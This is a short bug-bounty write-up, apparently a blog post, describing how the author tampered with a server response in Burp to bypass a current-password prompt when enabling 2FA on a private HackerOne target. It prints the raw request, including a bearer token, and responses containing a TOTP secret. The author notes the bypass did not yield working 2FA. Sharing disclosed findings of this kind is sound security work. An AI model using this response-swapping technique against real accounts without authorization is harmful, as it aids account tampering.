Bypassing Current Password
This post is about how I bypassed the current-password check while enabling 2FA in a HackerOne private program.
So let's get to the details.
I went to the settings page and navigated to the 2FA section.
It asked me to enter my current password. I entered a random password and intercepted the request with
Burp. The request looks like below:
POST /v1/otp/provision HTTP/1.1
Host: private.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.private.com/account-settings/2fa
authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZXNzaW9uX2lkIjoiSzdvSzlxTmZUcFotTVpPUURkVm11LTVRaFdHZmxIQkciLCJ1c2VyX2lkIjoieWtyNlQ1Q1hXZ2l1bDRmdnZNak5meXdIQTlHdlp2T0oiLCJ0ZWFtX2lkIjoiOTl4dzhOa3BxQkdSY2J3ejV5WXlMSUVpbVQ4R3ZPOUwiLCJuZWVkc19vdHAiOmZhbHNlLCJyZWFkX29ubHkiOmZhbHNlLCJoYXNfY29udHJhY3QiOmZhbHNlLCJlbnRpdGxlbWVudHMiOnsiaGFzX2NvbnRyYWN0IjpmYWxzZSwiaXNfZW1lcmdlbmN5X3N1cHBvcnRfYWxsb3dlZCI6ZmFsc2UsImlzX3NhbWxfYWxsb3dlZCI6ZmFsc2UsImlzX3N1cHBvcnRfdGlja2V0X2FsbG93ZWQiOmZhbHNlLCJzbGFfcmVzcG9uc2VfdGltZSI6ZmFsc2V9LCJpYXQiOjE1MjI3NzA1Njl9.qD11Xivy35IoJpE6tOqOtplJb0rHlXo2tzlCTHVCWJU
content-type: application/json
origin: https://www.private.com/
Content-Length: 25
Connection: close
{"password":"randompassword"}
The response is as below:
HTTP/1.1 403 Forbidden
Date: Tue, 03 Apr 2018 16:07:51 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 33
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-RateLimit-Limit: 10000
X-RateLimit-Remaining: 9999
ETag: W/"21-jJ8Jp4x8JRBrLHxO/fYEkk5Y3X4"
{"error":{"message":"Forbidden"}}
The response to the same request sent from my other account, with the correct password, is as below:
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2018 15:54:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 4276
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-RateLimit-Limit: 10000
X-RateLimit-Remaining: 9999
ETag: W/"10b4-h/c+lItVL4KULZt2cYWI3FRPF18"
{"qr_code":"data:image/png;base64,<base64 PNG of the QR code, omitted>","secret":"JZGXSMSLOY2GGNRT"}
What I did was use another account of mine, enter the correct password there, copy that 200 response, paste it in place of the victim account's response, and then forward the request.
By this I successfully bypassed the current-password check. I also checked whether scanning the QR code works, but it did not.
The team still said it would need to be fixed and rewarded me $200.
Thanks for reading!!
Congrats on your first
It's not my first bug, but it's my first on HackerOne :)